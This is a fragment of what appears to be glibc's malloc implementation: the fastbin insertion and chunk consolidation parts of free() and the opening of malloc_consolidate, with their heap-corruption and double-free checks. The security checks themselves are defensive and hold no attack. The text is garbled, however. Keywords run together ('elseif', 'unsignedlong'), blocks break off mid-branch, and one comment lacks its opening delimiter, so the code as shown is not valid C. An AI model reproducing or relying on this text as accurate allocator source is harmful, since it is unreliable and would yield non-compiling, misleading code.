if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ, 0) || __builtin_expect (chunksize (chunk_at_offset (p, size)) >= av->system_mem, 0)) { bool fail = true; /* We might not have a lock at this point and concurrent modifications of system_mem might result in a false positive. Redo the test after getting the lock. */ if (!have_lock) { __libc_lock_lock (av->mutex); fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ || chunksize (chunk_at_offset (p, size)) >= av->system_mem); __libc_lock_unlock (av->mutex); }
if (fail) malloc_printerr ("free(): invalid next size (fast)"); }
/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */ mchunkptr old = *fb, old2;
if (SINGLE_THREAD_P) { /* Check that the top of the bin is not the record we are going to add (i.e., double free). */ if (__builtin_expect (old == p, 0)) malloc_printerr ("double free or corruption (fasttop)"); p->fd = PROTECT_PTR (&p->fd, old); *fb = p; } else do { /* Check that the top of the bin is not the record we are going to add (i.e., double free). */ if (__builtin_expect (old == p, 0)) malloc_printerr ("double free or corruption (fasttop)"); old2 = old; p->fd = PROTECT_PTR (&p->fd, old); } while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
/* Check that size of fastbin chunk at the top is the same as size of the chunk that we are adding. We can dereference OLD only if we have the lock, otherwise it might have already been allocated again. */ if (have_lock && old != NULL && __builtin_expect (fastbin_index (chunksize (old)) != idx, 0)) malloc_printerr ("invalid fastbin entry (free)"); }
/* Consolidate other non-mmapped chunks as they arrive. */
elseif (!chunk_is_mmapped(p)) {
/* If we're single-threaded, don't lock the arena. */ if (SINGLE_THREAD_P) have_lock = true;
if (!have_lock) __libc_lock_lock (av->mutex);
nextchunk = chunk_at_offset(p, size);
/* Lightweight tests: check whether the block is already the top block. */ if (__glibc_unlikely (p == av->top)) malloc_printerr ("double free or corruption (top)"); /* Or whether the next chunk is beyond the boundaries of the arena. */ if (__builtin_expect (contiguous (av) && (char *) nextchunk >= ((char *) av->top + chunksize(av->top)), 0)) malloc_printerr ("double free or corruption (out)"); /* Or whether the block is actually not marked used. */ if (__glibc_unlikely (!prev_inuse(nextchunk))) malloc_printerr ("double free or corruption (!prev)");
/* Place the chunk in unsorted chunk list. Chunks are not placed into regular bins until after they have been given one chance to be used in malloc. */
/* If freeing a large space, consolidate possibly-surrounding chunks. Then, if the total unused topmost memory exceeds trim threshold, ask malloc_trim to reduce top.
Unless max_fast is 0, we don't know if there are fastbins bordering top, so we cannot tell for sure whether threshold has been reached unless fastbins are consolidated. But we don't want to consolidate on each free. As a compromise, consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD is reached. */
if ((unsignedlong)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) { if (atomic_load_relaxed (&av->have_fastchunks)) malloc_consolidate(av);
if (av == &main_arena) { #ifndef MORECORE_CANNOT_TRIM if ((unsignedlong)(chunksize(av->top)) >= (unsignedlong)(mp_.trim_threshold)) systrim(mp_.top_pad, av); #endif } else { /* Always try heap_trim(), even if the top chunk is not large, because the corresponding heap might go away. */ heap_info *heap = heap_for_ptr(top(av));
malloc_consolidate is a specialized version of free() that tears down chunks held in fastbins. Free itself cannot be used for this purpose since, among other things, it might place chunks back onto fastbins. So, instead, we need to use a minor variant of the same code. */
staticvoidmalloc_consolidate(mstate av) { mfastbinptr* fb; /* current fastbin being consolidated */ mfastbinptr* maxfb; /* last fastbin (for loop control) */ mchunkptr p; /* current chunk being consolidated */ mchunkptr nextp; /* next chunk to consolidate */ mchunkptr unsorted_bin; /* bin header */ mchunkptr first_unsorted; /* chunk to link to */
/* These have same use as in free() */ mchunkptr nextchunk; INTERNAL_SIZE_T size; INTERNAL_SIZE_T nextsize; INTERNAL_SIZE_T prevsize; int nextinuse;
/* Remove each chunk from fast bin and consolidate it, placing it then in unsorted bin. Among other reasons for doing this, placing in unsorted bin avoids needing to calculate actual bins until malloc is sure that chunks aren't immediately going to be reused anyway. */
maxfb = &fastbin (av, NFASTBINS - 1); fb = &fastbin (av, 0); do { p = atomic_exchange_acq (fb, NULL); if (p != 0) { do { { if (__glibc_unlikely (misaligned_chunk (p))) malloc_printerr ("malloc_consolidate(): " "unaligned fastbin chunk detected");